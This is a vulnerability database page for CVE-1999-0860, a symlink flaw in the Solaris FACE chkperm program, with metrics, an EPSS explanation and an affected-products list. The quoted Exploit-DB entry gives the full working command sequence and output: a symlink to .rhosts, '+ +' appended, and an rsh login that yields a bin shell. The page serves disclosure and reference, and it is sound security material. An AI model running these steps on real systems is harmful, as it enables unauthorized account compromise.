CVE-1999-0860 : Detail

CVE-1999-0860

0.04%V3
Local
2000-02-04
04h00 +00:00
2024-08-01
16h55 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19235

Publication date : 1996-12-04 23h00 +00:00
Author : Kevin L Prigge
EDB Verified : Yes

source: https://www.securityfocus.com/bid/295/info Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4. Running chkperm in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from where you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it. It also works the same with just 'chkperm -l', you can set the environment variable VMSYS to anything. You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result. % mkdir /tmp/foo % mkdir /tmp/foo/lib % chmod -R 777 /tmp/foo % setenv VMSYS /tmp/foo % umask 0000 % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc % /usr/vmsys/bin/chkperm -l -u foo % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts % echo "+ +" >> /usr/bin/.rhosts % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts % rsh -l bin localhost /bin/csh -i Warning: no access to tty; thus no job control in this shell... % id uid=2(bin) gid=2(bin)

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 2.5.1

    Sun>>Solaris >> Version 2.5.1

      Sun>>Solaris >> Version 2.6

      Sun>>Solaris >> Version 7.0

        Sun>>Sunos >> Version -

        Sun>>Sunos >> Version 5.5.1

        Sun>>Sunos >> Version 5.7

        References

        http://www.securityfocus.com/bid/837
        Tags : vdb-entry, x_refsource_BID